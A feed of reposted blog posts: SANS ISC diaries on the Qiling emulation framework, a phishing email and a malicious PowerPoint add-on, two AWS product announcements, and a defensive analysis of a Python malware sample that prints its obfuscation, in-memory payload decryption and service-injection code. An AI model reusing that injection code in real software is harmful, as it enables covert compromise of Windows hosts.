Qiling: A true instrumentable binary emulation framework, (Fri, Apr 30th)

This post was originally published on this site

A while ago, during the FLARE On 7 challenge last autumn, I had my first experience with the Qiling framework. It helped me solve the CrackInstaller challenge by Paul Tarter (@Hefrpidge). If you want to read more about this (very interesting) challenge: https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/flareon7-challenge9-solution.pdf

Qiling is an advanced binary emulation framework that supports many different platforms and architectures. It builds on the well-known Unicorn Engine and understands operating systems: it knows how to load libraries and executables, how to relocate shared libraries, and how to handle syscalls and IO. Qiling can execute binaries without their native operating system. You probably won't use Qiling to emulate complete applications, but emulating (large) functions and pieces of code works flawlessly.

The Qiling framework comes out of the box with support for roughly 40% of the Windows API calls and the Linux syscalls, and it also has some UEFI coverage. Qiling is capable of creating snapshots, hooking into syscalls and API calls, hot patching, remote debugging, and hijacking stdin and stdout. Because Qiling is a framework, it is easy to extend and use by writing Python code.

Let me walk you through some of the features. Qiling can be started in a Docker container, using the following command:

docker run -p 5000:5000 -v $(pwd):/work -it qilingframework/qiling

To start with Windows binaries, you first need to collect the DLLs (and registry) from a Windows system. The batch file https://github.com/qilingframework/qiling/blob/master/examples/scripts/dllscollector.bat is available for this purpose; it collects all the files necessary to get started.

After collecting the files, the following will make Qiling load the binary, configure the architecture and operating system, and point to the root filesystem (containing the Windows or Linux libraries):

ql = Qiling(["/work/credhelper.dll"], archtype="x8664", ostype="windows", rootfs="/work/10_break/rootfs/x8664_windows/", output="debug", console=True)

Now that the framework is initialized, it is ready to execute specific address ranges. But first you'll probably want to set up memory, stack, and register values, using the primitives offered by the underlying Unicorn Engine:

# set up a memory pool (size is the number of bytes to map)
pool = ql.mem.map_anywhere(size)

# write memory at a specific location
ql.mem.write(0x14000608c, ql.pack64(0x41424143414242))

# configure register values
ql.reg.rdx = param2

# set up stack values
ql.stack_write(0x358, ql.reg.rsp + 576) # local_358

Now that we have set up the memory, stack, and registers, we can start the emulation:

ql.run(begin=start_offset, end=end_offset)
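After the run completes, the emulated memory still holds the results, so they can be read back with the same memory primitives. A minimal sketch (here pool and size refer to the memory pool mapped earlier):

# after ql.run() returns, read the results back from emulated memory;
# pool and size refer to the pool mapped earlier
result = bytes(ql.mem.read(pool, size))
print(result.hex())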

If you add the disassembly capabilities of Capstone, parts of the memory can be disassembled easily. The snippet below hooks every instruction and runs the print_asm function:

from capstone import *
md = Cs(CS_ARCH_X86, CS_MODE_64)

def print_asm(ql, address, size):
    buf = ql.mem.read(address, size)
    for i in md.disasm(buf, address):
        print(":: 0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))

ql.hook_code(print_asm)

Dynamic hooks into the application can be set up using memory hooks, for example to intercept memory errors and invalid reads:

def ql_x86_windows_hook_mem_error(ql, access, addr, size, value):
    ql.dprint(D_INFO, "[+] ERROR: unmapped memory access at 0x%x" % addr)
    return False

ql.hook_mem_unmapped(ql_x86_windows_hook_mem_error)

def hook_mem_read_invalid(ql, access, addr, size, value):
    ql.dprint(D_INFO, "[+] ERROR: invalid memory read at 0x%x" % addr)
    return True

ql.hook_mem_read_invalid(hook_mem_read_invalid)

def hook_mem_invalid(ql, access, addr, size, value):
    ql.dprint(D_INFO, "[+] ERROR: invalid memory access at 0x%x" % addr)
    return True

ql.hook_mem_invalid(hook_mem_invalid)

Often you will want to intercept specific API calls, or add calls that haven't been implemented yet. The following code implements the StringFromGUID2 API call, writes a value to the memory location the lpsz parameter points to, and returns the number of characters written.

@winsdkapi(cc=STDCALL, dllname="ole32_dll", replace_params={
  "rguid": POINTER,
  "lpsz": POINTER,
  "cchMax": DWORD,
})
def hook_StringFromGUID2(ql, address, params):
    ql.nprint("StringFromGuid2", address, params)
    ql.mem.write(params.get('lpsz'), "test".encode('utf-16le') + '\x00'.encode('utf-16le'))
    return 5

ql.set_api("StringFromGUID2", hook_StringFromGUID2)

Hot patching code is just a matter of writing to memory locations:

# patch kernel execute
ql.mem.write(0x140002b59, b'\x90\x90\x90\x90\x90\x90')

For this specific FlareOn challenge, I created a small Ghidra Python plugin that let me visually select the address range to emulate. The Ghidra plugin communicates with a Flask server, which runs my Qiling code to perform the emulation and returns the results to Ghidra. Using this approach it was easy to emulate small parts of the code, eventually leading to the solution of the challenge.
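The plugin and server themselves are beyond the scope of this post, but the server side can be as small as a single Flask route. Here is a minimal sketch of the idea; the endpoint name, the JSON fields, and the memory-dump logic are my own illustration, not the original plugin code:

from flask import Flask, request, jsonify
from qiling import Qiling

app = Flask(__name__)

@app.route("/emulate", methods=["POST"])
def emulate():
    # Ghidra posts the selected address range (and a region to dump) as JSON
    req = request.get_json()
    ql = Qiling(["/work/credhelper.dll"], archtype="x8664", ostype="windows",
                rootfs="/work/10_break/rootfs/x8664_windows/")
    ql.run(begin=int(req["start"], 16), end=int(req["end"], 16))
    # return a hex dump of the memory region the caller is interested in
    data = bytes(ql.mem.read(int(req["addr"], 16), int(req["size"])))
    return jsonify({"result": data.hex()})

app.run(host="0.0.0.0", port=5000)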
 

There is much more to Qiling, but for now, have a great day!

Remco Verhoef (@remco_verhoef)
ISC Handler – Founder of DTACT
PGP Key
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

From Python to .Net, (Thu, Apr 29th)

This post was originally published on this site

The Microsoft operating system provides the .Net framework[1] to developers. It allows them to fully interact with the OS and write powerful applications… but also malicious ones. In a previous diary[2], I talked about a malicious Python script that interacted with the OS using the ctypes[3] library. Yesterday, I found another Python script that interacts with the .Net framework to perform its low-level actions.

The script, called 'prophile.py'[4] (SHA256:65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361), has a low VT score of 4/58. Let's have a look at it!

First, all the interesting strings are obfuscated using a one-liner:

>>> URIAbQ=lambda s,k:''.join([chr((ord(c)^k)%0x100) for c in s])
>>> URIAbQ('\x8d\x98\x8a\x92\x95\x90\x8a\x8d\xd9\xd6\xbf\xb0\xd9\xdb\xaa\xbc\xab\xaf\xb0\xba\xbc\xaa\xd9\x9c\x88\xd9', 249)
'tasklist /FI "SERVICES eq '
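By the way, if the XOR key were not visible in the calls, a single-byte key like this is trivial to brute force. A quick sketch (my own helper, not part of the malware) that tries all 256 keys and keeps the results that decode to printable ASCII:

def brute_xor(blob):
    # try every single-byte key; keep candidates that decode to printable ASCII
    for key in range(256):
        candidate = ''.join(chr(ord(c) ^ key) for c in blob)
        if all(32 <= ord(c) < 127 for c in candidate):
            print(key, repr(candidate))

# key 249 yields 'tasklist /FI "SERVICES eq '
brute_xor('\x8d\x98\x8a\x92\x95\x90\x8a\x8d\xd9\xd6\xbf\xb0\xd9\xdb\xaa\xbc\xab\xaf\xb0\xba\xbc\xaa\xd9\x9c\x88\xd9')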

As the diary title says, the Python script uses the Python.Net library[5] to interact with the .Net framework:

Note: all the snippets of code have been decoded/beautified

from System.Security.Cryptography import *
from System.Reflection import *
import System

The script uses encrypted payloads, but it was not possible to decrypt them because the script was found outside of its context. Indeed, it expects one command-line argument:

if __name__ == "__main__":
    if len(sys.argv) != 2:
        exit()

The expected parameter is the encryption key as we can see in this function call:

payload = DecryptPayloadToMemory(base64.b64decode(payload1[16:]), sys.argv[1], payload1[:16], log_file)

I did not find the parameter passed as an argument, so there is no way to decrypt the payloads!

These payloads (stored in the script) are decrypted in memory:

def DecryptPayloadToMemory(payload, key, iv, log_file):
    instance = None
    try:
        rm = RijndaelManaged(KeySize=128, BlockSize=128)
        rm.Key = Str2Bytes(key)
        rm.IV = Str2Bytes(iv)
        rm.Padding = PaddingMode.PKCS7
        payload = Str2Bytes(payload)
        with System.IO.MemoryStream() as memory_handle:
            with CryptoStream(memory_handle,rm.CreateDecryptor(rm.Key, rm.IV), CryptoStreamMode.Write) as crypto_handle:
                crypto_handle.Write(payload, 0, payload.Length)
                print(crypto_handle.FlushFinalBlock())
                memory_handle.Position = 0
                instance = System.Array.CreateInstance(System.Byte, memory_handle.Length)
                memory_handle.Read(instance, 0, instance.Length)
    except System.SystemException as ex:
        log_file.write('[!] Net exc (msg: {0}, st: {1})'.format(ex.Message, ex.StackTrace))
        log_file.flush()
        instance = None
    return instance
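Note that RijndaelManaged with a 128-bit block size is plain AES-128 in CBC mode with PKCS7 padding, so if the key ever turns up, the payloads can be decrypted without the .Net runtime at all. A minimal pure-Python equivalent, assuming the pycryptodome package (the function name and variables are mine):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

def decrypt_payload(stored, key):
    # the first 16 characters of the stored payload are the IV,
    # the remainder is the base64-encoded ciphertext
    iv = stored[:16].encode()
    ciphertext = base64.b64decode(stored[16:])
    cipher = AES.new(key.encode(), AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(ciphertext), AES.block_size)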

The script injects malicious code into two Windows services:

process_name = "rpceptmapper"
process_name2 = "lanmanserver"

Two payloads are injected into these services using the Assembly.CreateInstance method[6]:

def InjectCode(enc_payld, process_name, log_file, asm):
    payload = DecryptPayloadToMemory(base64.b64decode(enc_payld[16:]), sys.argv[1], enc_payld[:16], log_file)
    if payload == None:
        log_file.write('[!] Failed to get payload')
        return False
    try:
        type = asm.GetType('DefaultSerializer.DefaultSerializer')
        pid = GetProcessPID(process_name)
        if pid != 0:
            NQHRxUDMlW = asm.CreateInstance(type.FullName,False,BindingFlags.ExactBinding,None,System.Array[System.Object]([payload,pid]),None,None)
            NQHRxUDMlE = type.GetMethod('Invoke')
            log_file.write(NQHRxUDMlE.Invoke(NQHRxUDMlW, None))
        else:
            log_file.write('[!] Failed to get pid')
            return True
    except System.SystemException as ex:
        log_file.write('[!] Net exc (msg: {0}, st: {1})'.format(ex.Message,ex.StackTrace))
        return False
    return True

Another example of how Python is becoming more and more popular with attackers!

[1] https://dotnet.microsoft.com/download/dotnet-framework
[2] https://isc.sans.edu/forums/diary/Python+and+Risky+Windows+API+Calls/26530
[3] https://docs.python.org/3/library/ctypes.html
[4] https://bazaar.abuse.ch/sample/65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361/
[5] http://pythonnet.github.io
[6] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.createinstance?view=net-5.0

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon Nimble Studio – Build a Creative Studio in the Cloud

This post was originally published on this site

Amazon Nimble Studio is a new service that creative studios can use to produce visual effects, animations, and interactive content entirely in the cloud with AWS, from the storyboard sketch to the final deliverable. Nimble Studio provides customers with on-demand access to virtual workstations, elastic file storage, and render farm capacity. It also provides built-in automation tools for IP security, permissions, and collaboration.

Traditional creative studios often face the challenge of attracting and onboarding talent. Talent is not localized, and it’s important to speed up the hiring of remote artists and make them as productive as if they were in the same physical space. It’s also important to allow distributed teams to use the same workflow, software, licenses, and tools that they use today, while keeping all assets secure.

In addition, traditional customers either resort to buying more hardware for their local render farms, rent hardware at a premium, or extend their capacity with cloud resources. Those who decide to render in the cloud have to navigate these options and the large breadth of AWS offerings, and the perceived complexity can lead them to choose legacy approaches.

Screenshot of maya lighting

Today, we are happy to announce the launch of Amazon Nimble Studio, a service that addresses these concerns by providing ready-made IT infrastructure as a service, including workstations, storage, and rendering.

Nimble Studio is part of a broader portfolio of purpose-built AWS capabilities for media and entertainment use cases, including AWS services, AWS and Partner Solutions, and over 400 AWS Partners. You can learn more about our AWS for Media & Entertainment initiative, also launched today, which helps media and entertainment customers easily identify industry-specific AWS capabilities across five key business areas: Content production, Direct-to-consumer and over-the-top (OTT) streaming, Broadcast, Media supply chain and archive, and Data science and Analytics.

Benefits of using Nimble Studio
Nimble Studio is built on top of AWS infrastructure, ensuring performant computing power and security of your data. It also enables an elastic production, allowing studios to scale the artists’ workstations, storage, and rendering needs based on demand.

When using Nimble Studio, artists can use their favorite creative software tools on an Amazon Elastic Compute Cloud (EC2) virtual workstation. Nimble Studio uses EC2 for compute, Amazon FSx for storage, AWS Single Sign-On for user management, and AWS Thinkbox Deadline for render farm management.

Nimble Studio is open and compatible with most storage solutions that support the NFS/SMB protocol, such as Weka.io and Qumulo, so you can bring your own storage.

For high-performance remote display, the service uses the NICE DCV protocol and provisions G4dn instances that are available with NVIDIA GPUs.

By providing the ability to share assets using globally accessible data storage, Nimble Studio makes it possible for studios to onboard global talent. And Nimble Studio centrally manages licenses for many software packages, reduces the friction of onboarding new artists, and enables predictable budgeting.

In addition, Nimble Studio comes with an artist-friendly console. Artists don’t need to have an AWS account or use the AWS Management Console to do their work.

But my favorite thing about Nimble Studio is that it’s intuitive to set up and use. In this post, I will show you how to create a cloud-based studio.

screenshot of the intro of nimble studio

 

Set up a cloud studio using Nimble Studio
To get started with Nimble Studio, go to the AWS Management Console and create your cloud studio. You can decide if you want to bring your existing resources, such as file storage, render farm, software license service, Amazon Machine Image (AMI), or a directory in Active Directory. Studios that migrate existing projects can use AWS Snowball for fast and secure physical data migration.

Configure AWS SSO
For this configuration, choose the option where you don't have any existing resources, so you can see how easy it is to get started. The first step is to configure AWS SSO in your account. You will use AWS SSO to assign artists role-based permissions to access the studio. To set up AWS SSO, follow these steps in the AWS Directory Services console.

Configure your studio with StudioBuilder
StudioBuilder is a tool that helps you deploy your studio simply by answering some configuration questions. StudioBuilder is available as an AMI, which you can get for free from the AWS Marketplace.

After you get the AMI from AWS Marketplace, you can find it in the Private images list in the EC2 console. Launch that AMI on an EC2 instance; I recommend a t3.medium instance. Set the Auto-assign Public IP field to Enable to ensure that your instance receives a public IP address; you will use it later to connect to the instance.
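If you prefer to script this step, the same launch can be done through the EC2 API. A minimal boto3 sketch (the AMI ID, key pair, and subnet are placeholders to replace with your own values):

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

resp = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",   # placeholder: the StudioBuilder AMI from AWS Marketplace
    InstanceType="t3.medium",
    MinCount=1,
    MaxCount=1,
    KeyName="my-key-pair",             # placeholder
    NetworkInterfaces=[{
        "DeviceIndex": 0,
        "SubnetId": "subnet-0123456789abcdef0",  # placeholder
        "AssociatePublicIpAddress": True,        # the Auto-assign Public IP = Enable equivalent
    }],
)
print(resp["Instances"][0]["InstanceId"])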

Screenshot of launching the StudioBuilder AMI

As soon as you connect to the instance, you are directed to the StudioBuilder setup.

Screenshot of studio builder setup

The setup guides you, step by step, through the configuration of networking, storage, Active Directory, and the render farm. Simply answer the questions to build the right studio for your needs.

Screenshot of the studio building

The setup takes around 90 minutes. You can monitor the progress using the AWS CloudFormation console. Your studio is ready when four new CloudFormation stacks have been created in your account: Network, Data, Service, and Compute.

Screenshot of stacks completed in CloudFormation

Now terminate the StudioBuilder instance and return to the Nimble Studio console. In Studio setup, you can see that you’ve completed four of the five steps.

Screenshot of the studio setup tutorial

Assign access to studio admin and users
To complete the last step, Step 5: Allow studio access, you will use the Active Directory directory you created during the StudioBuilder step and the AWS SSO configuration from earlier to give administrators and artists access to the studio.

Follow the instructions in the Nimble Studio console to connect the directory to AWS SSO. Then you can add administrators to your studio. Administrators have control over what users can do in the studio.

At this point, you can add users to the studio, but because your directory doesn’t have users yet, move to the next step. You can return to this step later to add users to the studio.

Accessing the studio for the first time
When you open the studio for the first time, you will find the Studio URL in the Studio Manager console. You will share this URL with your artists when the studio is ready. To sign in to the studio, you need the user name and password of the Admin you created earlier.

Screenshot of studio name

Launch profiles
When the studio opens, you will see two launch profiles: one for a render farm instance and one for a workstation. They were created by StudioBuilder when you set up the studio. Launch profiles control access to resources in your studio, such as compute farms, shared file systems, instance types, and AMIs. You can use the Nimble Studio console to create as many launch profiles as you need to customize your team's access to the studio resources.

Screenshot of the studio

When you launch a profile, you launch a workstation that includes all the software you provided in the installed AMI. It takes a few minutes for the instance to launch for the first time. When it is ready, you will see the instance in the browser. You can sign in to it with the same user name and password you use to sign in to the studio.

Screenshot of launching a new instance

Now your studio is ready! Before you share it with your artists, you might want to configure more launch profiles, add your artist users to the directory, and give those users permissions to access the studio and launch profiles.

Here's a short video that describes how Nimble Studio works and how it can help you:

Available now
Nimble Studio is now available in the US West (Oregon), US East (N. Virginia), Canada (Central), Europe (London), Asia Pacific (Sydney) Regions and the US West (Los Angeles) Local Zone.

Learn more about Amazon Nimble Studio and get started building your studio in the cloud.

Marcia

Deeper Analysis of my Last Malicious PowerPoint Add-On, (Wed, Apr 28th)

This post was originally published on this site

Last week, I wrote a diary about a malicious PowerPoint add-on[1], and I concluded by saying that I was not able to continue the investigation because the URL found in the macro pointed to a blogspot.com page. Ron, one of our readers, found that this page was indeed malicious and contained a piece of JavaScript executed by mshta.exe.

The document discovered by Ron was not identical to mine (the macro changed slightly), but it pointed to the same URL (the blog has been closed by Blogger in the meantime).

How did I miss this simple piece of JavaScript? I don't know, but thanks to Ron for sharing the nice document[2]. Very interesting read!

[1] https://isc.sans.edu/forums/diary/Malicious+PowerPoint+AddOn+Small+Is+Beautiful/27342/
[2] http://isc.h2392901.stratoserver.net/Xavier_1.pdf

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Get Started Using Amazon FSx File Gateway for Fast, Cached Access to File Server Data in the Cloud

This post was originally published on this site

As traditional workloads continue to migrate to the cloud, some customers have been unable to take advantage of cloud-native services to host data typically held on their on-premises file servers. For example, data commonly used for team and project file sharing, or with content management systems, has needed to reside on-premises due to issues of high latency, or constrained or shared bandwidth, between customer premises and the cloud.

Today, I’m pleased to announce Amazon FSx File Gateway, a new type of AWS Storage Gateway that helps you access data stored in the cloud with Amazon FSx for Windows File Server, instead of continuing to use and manage on-premises file servers. Amazon FSx File Gateway uses network optimization and caching so it appears to your users and applications as if the shared data were still on-premises. By moving and consolidating your file server data into Amazon FSx for Windows File Server, you can take advantage of the scale and economics of cloud storage, and divest yourself of the undifferentiated maintenance involved in managing on-premises file servers, while Amazon FSx File Gateway solves issues around latency and bandwidth.

Replacing On-premises File Servers
Amazon FSx File Gateway is an ideal solution to consider when replacing your on-premises file servers. Low-latency access ensures you can continue to use latency-sensitive on-premises applications, and caching conserves shared bandwidth between your premises and the cloud, which is especially important when you have many users all attempting to access file share data directly.

You can attach an Amazon FSx file system and present it through a gateway to your applications and users, provided they are all members of the same Active Directory domain; the AD infrastructure can be hosted in AWS Directory Service or managed on-premises.

Your data, as mentioned, resides in Amazon FSx for Windows File Server, a fully managed, highly reliable and resilient file system, eliminating the complexity involved in setting up and operating file servers, storage volumes, and backups. Amazon FSx for Windows File Server provides a fully native Windows file system in the cloud, with full Server Message Block (SMB) protocol support, and is accessible from Windows, Linux, and macOS systems running in the cloud or on-premises. Built on Windows Server, Amazon FSx for Windows File Server also exposes a rich set of administrative features including file restoration, data deduplication, Active Directory integration, and access control via Access Control Lists (ACLs).

Choosing the Right Gateway
You may be aware of Amazon S3 File Gateway (originally named File Gateway), and might now be wondering which type of workload is best suited for the two gateways:

  • With Amazon S3 File Gateway, you can access data stored in Amazon Simple Storage Service (S3) as files, and it’s also a solution for file ingestion into S3 for use in running object-based workloads and analytics, and for processing data that exists in on-premises files.
  • Amazon FSx File Gateway, on the other hand, is a solution for moving network-attached storage (NAS) into the cloud while continuing to have low-latency, seamless access for your on-premises users. This includes two general-purpose NAS use-cases that use the SMB file protocol: end-user home directories and departmental or group file shares. Amazon FSx File Gateway supports multiple users sharing files, with advanced data management features such as access controls, snapshots for data protection, integrated backup, and more.

One additional unique feature I want to note is Amazon FSx File Gateway integration with backups. This includes backups taken directly within Amazon FSx and those coordinated by AWS Backup. Prior to a backup starting, Amazon FSx for Windows File Server communicates with each attached gateway to ensure any uncommitted data gets flushed. This helps further reduce your administrative overhead and worries when moving on-premises file shares into the cloud.

Working with Amazon FSx File Gateway
Amazon FSx File Gateway is available on multiple platform options. You can order and deploy a hardware appliance into your on-premises environment, deploy it as a virtual machine into your on-premises environment (VMware ESXi, Microsoft Hyper-V, Linux KVM), or deploy it in the cloud as an Amazon Elastic Compute Cloud (EC2) instance. The available options are displayed as you start to create a gateway from the AWS Storage Gateway Management Console, together with setup instructions for each option.

Below, I choose to use an EC2 instance for my gateway.

FSx File Gateway platform options

The process of setting up a gateway is pretty straightforward, and since the documentation here goes into detail, I'm not going to repeat the flow in this post. Essentially, the steps are to first create a gateway, then join it to your domain, and then attach an Amazon FSx file system. After that, your remote clients can work with the data on the file system; the important difference is that they connect to the gateway using a network share, instead of connecting directly to the Amazon FSx file system.
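The same flow can also be driven through the Storage Gateway API. Below is a rough boto3 sketch of the three steps; all ARNs, names, and credentials are placeholders, and the parameters shown are an outline rather than a complete recipe:

import boto3

sgw = boto3.client("storagegateway", region_name="us-east-1")

# 1. activate the gateway (the activation key comes from the gateway VM or instance)
gw = sgw.activate_gateway(
    ActivationKey="ACTIVATION-KEY",            # placeholder
    GatewayName="fsx-file-gateway",
    GatewayTimezone="GMT-5:00",
    GatewayRegion="us-east-1",
    GatewayType="FILE_FSX_SMB",
)

# 2. join the gateway to the Active Directory domain
sgw.join_domain(
    GatewayARN=gw["GatewayARN"],
    DomainName="corp.example.com",             # placeholder
    UserName="admin",                          # placeholder
    Password="********",                       # placeholder
)

# 3. attach the Amazon FSx file system to the gateway
sgw.associate_file_system(
    ClientToken="unique-token-1",
    GatewayARN=gw["GatewayARN"],
    LocationARN="arn:aws:fsx:us-east-1:111122223333:file-system/fs-0123456789abcdef0",
    UserName="admin",                          # placeholder
    Password="********",                       # placeholder
)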

Below is the general configuration for my gateway, created in US East (N. Virginia).

FSx File Gateway Details

And here are the details of my Amazon FSx file system, running in an Amazon Virtual Private Cloud (VPC) in US East (N. Virginia), that will be attached to my gateway.

FSx File System Details

Note that I have created and activated the gateway in the same region as the source Amazon FSx file system, and will manage the gateway from US East (N. Virginia). The gateway virtual machine (VM) is deployed as an EC2 instance running in a VPC in our remote region, US West (Oregon). I’ve also established a peering connection between the two VPCs.

Once I have attached the Amazon FSx file system to my Amazon FSx File Gateway, in the AWS Storage Gateway Management Console I select FSx file systems and then the respective file system instance. This gives me the details of the command needed by my remote users to connect to the gateway.

Viewing the attached Amazon FSx File System

Exploring an End-user Scenario with Amazon FSx File Gateway
Let’s explore a scenario that may be familiar to many readers, that of a “head office” that has moved its NAS into the cloud, with one or more “branch offices” in remote locations that need to connect to those shares and the files they hold. In this case, my head office/branch office scenario is for a fictional photo agency, and is set up so I can explore the gateway’s cache refresh functionality. For this, I’m imagining a scenario where a remote user deletes some files accidentally, and then needs to contact an admin in the head office to have them restored. This is possibly a fairly common scenario, and one I know I’ve had to both request, and handle, in my career!

My head office for my fictional agency is located in US East (N. Virginia) and the local admin for that office (me) has a network share attached to the Amazon FSx file system instance. My branch office, where my agency photographers work, is located in the US West (Oregon) region, and users there connect to my agency’s network over a VPN (an AWS Direct Connect setup could also be used). In this scenario, I simulate the workstations at each office using Amazon Elastic Compute Cloud (EC2) instances.

In my fictional agency, photographers upload images to the agency's Amazon FSx file system, connected via a network share to the gateway. Even though my fictional head office, and the Amazon FSx file system itself, are resources located on the east coast, the gateway and its cache provide a fast, low-latency connection for users in the remote branch office, making it seem as though there is a local NAS. After photographers upload images from their assignments, additional staff in the head office do some basic work on them, and make the partly-processed images available back to the photographers on the west coast via the file share.

The image below illustrates the resource setup for my fictional agency.

My sample head/branch office setup, as AWS resources

I have set up scheduled multiple daily backups for the file system, as you might expect, but I've also gone a step further and enabled shadow copies on my Amazon FSx file system. Remember, Amazon FSx for Windows File Server is a Windows File Server instance; it just happens to be running in the cloud. You can find details of how to set up shadow copies (which are not enabled by default) in the documentation here. For the purposes of the fictional scenario in this blog post, I set up a schedule so that my shadow copies are taken every hour.

Back to my fictional agency. One of my photographers on the west coast, Alice, is logged in and working with a set of images that have already had some work done on them by the head office. In this image, it’s apparent Alice is connected and working on her images via the network share IP marked in an earlier image in this post – this is the gateway file share.

Suddenly, disaster strikes and Alice accidentally deletes all of the files in the folder she was working in. Picking up the phone, she calls the admin (me) in the east coast head office and explains the situation, wondering if we can get the files back.

Since I’d set up scheduled daily backups of the file system, I could probably restore the deleted files from there. This would involve a restore to a new file system, then copying the files from that new file system to the existing one (and deleting the new file system instance afterwards). But, having enabled shadow copies, in this case I can restore the deleted files without resorting to the backups. And, because I enabled automated cache refreshes on my gateway, with the refresh period set to every 5 minutes, Alice will see the restored files relatively quickly.

My admin machine (in the east coast office) has a network share to the Amazon FSx file system, so I open an explorer view onto the share, right-click the folder in question, and select Restore previous versions. This gives me a dialog where I can select the most recent shadow copy.

Restoring the file data from shadow copies

I ask Alice to wait 5 minutes, then refresh her explorer view. The changes in the Amazon FSx file system are propagated to the cache on the gateway and sure enough, she sees the files she accidentally deleted and can resume work. (When I saw this happen for real in my test setup, even though I was expecting it, I let out a whoop of delight!). Overall, I hope you can see how easy it is to set up and operate an Amazon FSx File Gateway with an Amazon FSx for Windows File Server.

Get Started Today with Amazon FSx File Gateway
Amazon FSx File Gateway provides a low-latency, efficient connection for remote users when moving on-premises Windows file systems into the cloud. This benefits users who experience higher latencies, and shared or limited bandwidth, between their premises and the cloud. Amazon FSx File Gateway is available today in all commercial AWS regions where Amazon FSx for Windows File Server is available. It’s also available in the AWS GovCloud (US-West) and AWS GovCloud (US-East) regions, and the Amazon China (Beijing), and China (Ningxia) regions.

You can learn more on this feature page, and get started right away using the feature documentation.

Diving into a Singapore Post Phishing E-mail, (Tue, Apr 27th)

This post was originally published on this site

With the sustained persistence of COVID-19 globally, postal and e-commerce related phishing e-mails remain one of the methods most widely favoured by adversaries and cybercrime groups. Although postal and shipping companies have often put up warnings with respect to phishing sites and e-mails (for example Singapore Post [1] and DHL [2]), phishing sites and e-mails continue to be propagated. While organizations continue to deploy technologies and invest in security awareness training to allow better detection of phishing e-mails, individuals who are not particularly IT-savvy could still fall prey, especially on their personal e-mail accounts, which may not have enterprise phishing protection features. I was recently forwarded one phishing e-mail for a quick look. Unfortunately, by the time I got to it, the phishing page appeared to have been taken down. However, some salient points struck me when I analyzed the contents of the e-mail, and I wanted to talk a bit about them so as to increase awareness.

A check on the e-mail headers yielded the following information (with reference to Figure 1, and some details were omitted to preserve privacy):

Figure 1: E-Mail Headers

I did some research on the e-mail address in the “From” and “Sender” fields, and discovered that it originated from a legitimate company (hence the redaction). Of course, the name reflected in the “From” and “Sender” fields should have raised some red flags, since it stated “Singapore-post” but displayed an unrelated e-mail address.
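This kind of display-name versus sender-domain mismatch is also easy to check programmatically. A small sketch using Python's standard library (the brand keyword list and heuristics are my own illustration):

from email import message_from_string
from email.utils import parseaddr

def check_display_name(raw_message, brand_keywords=("singapore post", "singpost")):
    msg = message_from_string(raw_message)
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower()
    # flag mails whose display name claims a brand the sender domain does not match
    for kw in brand_keywords:
        if kw in name.lower().replace("-", " ") and kw.replace(" ", "") not in domain:
            return "suspicious: display name %r vs sender domain %r" % (name, domain)
    return "no obvious mismatch"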

Moving on to the contents of the e-mail. With reference to Figure 2 below, we can see the contents (some information have been removed to preserve privacy).

Figure 2: Contents of Phishing E-Mail

The first thing that drew my attention was the logo, which was retrieved from a third-party site and felt particularly dodgy. When I visited the “phishing” site, a webpage belonging to the original site loaded, with no signs of any content related to Singapore Post (thankfully!). While it appeared that the owner of the website had removed the phishing content and replaced it with something of their own, the link itself was still kept.

Looking at all the factors, there were many opportunities to deny the adversaries from succeeding in sending out the phishing e-mail. The factors that could be addressed are as follows:

1. Image Hotlinking: This is a common issue faced by many individuals and organizations hosting their websites. If left unchecked, it can affect uptime and bandwidth costs (especially for small businesses that often cannot afford high-capacity web hosting plans). In this case, we can see that the third-party website inadvertently facilitated the adversaries’ attempts by providing the logo for their phishing e-mails. To mitigate this issue, one can consider using Content Delivery Networks (CDN) that have hotlink protection features, or tweak cPanel settings (if it is used to administer your website) as shown here [3]. There are a few other methods as well, but the configuration will vary with the type of CMS the website is running on. Nevertheless, there is some robust documentation available online with respect to image hotlinking, and website owners should consider implementing it where possible (a minimal illustration of the underlying idea follows after this list).

2. Securing assets: A legitimate organization’s e-mail system was compromised to send out the phishing e-mail, and another legitimate organization’s website was used to host the phishing page. I did not probe into the affected organizations’ assets, but such compromises are usually due to unpatched systems, security misconfigurations, or a successful phish of administrative credentials. Unfortunately, other than taking a proactive approach towards cybersecurity within the limits of a given budget, there isn’t much an organization can do (ignoring the issue is one way, but that is bound to bring more disastrous and pressing issues to the organization/business in the future). Building and maintaining security controls can be challenging, but there is useful documentation, such as the CIS Controls (version 8 launching soon [4]), that organizations can refer to in order to bolster their cybersecurity readiness.
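Returning to the hotlink protection mentioned in point 1: it is normally configured at the web server or CDN, but conceptually it boils down to a Referer check. A minimal Flask sketch of the idea (the allowed domain and route are illustrative assumptions, and input sanitization is omitted for brevity):

from flask import Flask, request, abort, send_file

app = Flask(__name__)
ALLOWED = ("example.com",)  # your own site(s); illustrative placeholder

@app.route("/images/<name>")
def serve_image(name):
    referer = request.headers.get("Referer", "")
    # serve images only when the request originates from our own pages
    if referer and not any(domain in referer for domain in ALLOWED):
        abort(403)
    return send_file("./images/" + name)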

As always, when in doubt, verify the authenticity of the e-mail received. In addition, why not check in with your loved ones and friends to see if they have received any phishing e-mails, and let them know how they can spot potential ones? These are no doubt challenging times, and maintaining access to your digital accounts should be one of the top priorities.

References:

[1] https://www.singpost.com/online-security-you

[2] https://www.dhl.com/sg-en/home/footer/fraud-awareness.html

[3] https://documentation.cpanel.net/display/84Docs/Hotlink+Protection

[4] https://www.sans.org/blog/cis-controls-v8/

———–
Yee Ching Tok, ISC Handler
Personal Site
Twitter

